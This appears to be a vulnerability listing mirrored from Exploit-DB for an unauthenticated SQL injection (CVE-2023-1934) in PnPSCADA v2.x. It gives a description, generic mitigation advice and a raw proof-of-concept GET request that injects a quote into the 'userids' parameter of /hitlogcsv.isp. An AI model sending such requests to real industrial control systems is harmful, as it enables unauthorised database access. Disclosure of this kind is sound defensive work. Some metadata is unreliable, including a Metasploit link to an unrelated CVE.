PnPSCADA v2.x - Unauthenticated PostgreSQL Injection

vendor:

PnPSCADA

by:

Momen Eldawakhly

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PnPSCADA

Affected Version From: PnPSCADA v2.x

Affected Version To: PnPSCADA v2.x

Patch Exists: NO

Related CWE: CVE-2023-1934

CPE: a:pnpscada:pnpscada:2.0

Metasploit: https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2022-4450/

Other Scripts:

Platforms Tested: Unix

2023

PnPSCADA v2.x – Unauthenticated PostgreSQL Injection

This exploit allows an attacker to perform unauthenticated SQL injection in PnPSCADA v2.x. By manipulating the 'userids' parameter in the 'hitlogcsv.isp' endpoint, an attacker can inject malicious SQL queries and potentially gain unauthorized access to the backend database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, implementing proper access controls and authentication mechanisms can help prevent unauthorized access to the database.

Source

Exploit-DB raw data:

# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
# Date: 15/5/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
# Vendor Homepage: https://pnpscada.com/
# Version: PnPSCADA (cross platforms): v2.x
# Tested on: Unix
# CVE : CVE-2023-1934
# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8

SQLi crashing point:

GET /hitlogcsv.isp?userids=1337'&startdate=
2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00
HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)
AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0
Safari/534.14
Host: vulnerablepnpscada.int
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close